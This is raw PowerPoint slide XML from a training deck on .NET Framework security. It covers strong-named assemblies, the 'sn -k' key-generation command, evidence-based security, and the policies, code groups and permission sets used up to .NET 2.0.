          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Strong names are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Unique identifiers (containing a public key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used to digitally sign assemblies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Strong-named assemblies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Prevent tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Confirm the identity of the assembly’s </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>publisher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Allow side-by-side components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185348" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1489075" y="2641600"/>
            <a:ext cx="6705600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sn –k MyFullKey.snk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185364" name="Picture 20" descr="Security_Authorized01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7518400" y="4429125"/>
            <a:ext cx="1152525" cy="1614488"/>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Picture 2" descr="Microsoft logo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="1981200" y="2870200"/>
            <a:ext cx="5181600" cy="850900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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78" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Evidence-Based Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190479" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Evidence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Is assessed when an assembly is loaded </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Is used to determine the permissions for the assembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can include the assembly’s:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Strong name information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Zone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authenticode signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="3886200"/>
            <a:ext cx="2755900" cy="1789113"/>
            <a:chOff x="3505" y="2448"/>
            <a:chExt cx="1736" cy="1127"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 13"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4540" y="2448"/>
              <a:ext cx="701" cy="1127"/>
              <a:chOff x="4596" y="2619"/>
              <a:chExt cx="563" cy="905"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="190475" name="Picture 11" descr="Encryption01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4596" y="2619"/>
                <a:ext cx="563" cy="905"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="190476" name="Picture 12" descr="Clock01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4648" y="3039"/>
                <a:ext cx="380" cy="408"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="190474" name="Picture 10" descr="Search01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-2288571">
              <a:off x="3505" y="2520"/>
              <a:ext cx="1335" cy="652"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:gr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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Policies (up to .NET 2.0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="392239" name="Group 47"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="733425" y="1058863"/>
          <a:ext cx="7356475" cy="4935538"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2490788"/>
                <a:gridCol w="4865687"/>
              </a:tblGrid>
              <a:tr h="458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Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Security Entity</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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alpha val="5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Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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alpha val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1758950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="60000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="D60093"/>
                        </a:buClr>
                        <a:buSzPct val="65000"/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000"/>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Policy</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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alpha val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Is set by administrators</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Is enforced at runtime</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Simplifies administration</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Contains permissions</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Contains code groups</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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alpha val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1549400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="60000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="D60093"/>
                        </a:buClr>
                        <a:buSzPct val="65000"/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000"/>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Code Group</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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alpha val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Associates similar components</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Is evidence based</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Is linked to permission set(s)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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alpha val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="60000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="D60093"/>
                        </a:buClr>
                        <a:buSzPct val="65000"/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000"/>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Permission Set</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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tx2">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="333375" marR="0" lvl="0" indent="-333375" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buBlip>
                          <a:blip r:embed="rId3"/>
                        </a:buBlip>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Is a set of granted permissions</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880"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folHlink">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>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Permission Sets</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="504834" name="Picture 2" descr="http://www.code-magazine.com/ArticleImage.aspx?QuickID=0405031&amp;Image=fig1.tif&amp;MaxWidth=100000"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1090431" y="1250302"/>
            <a:ext cx="7221361" cy="4963885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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17" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
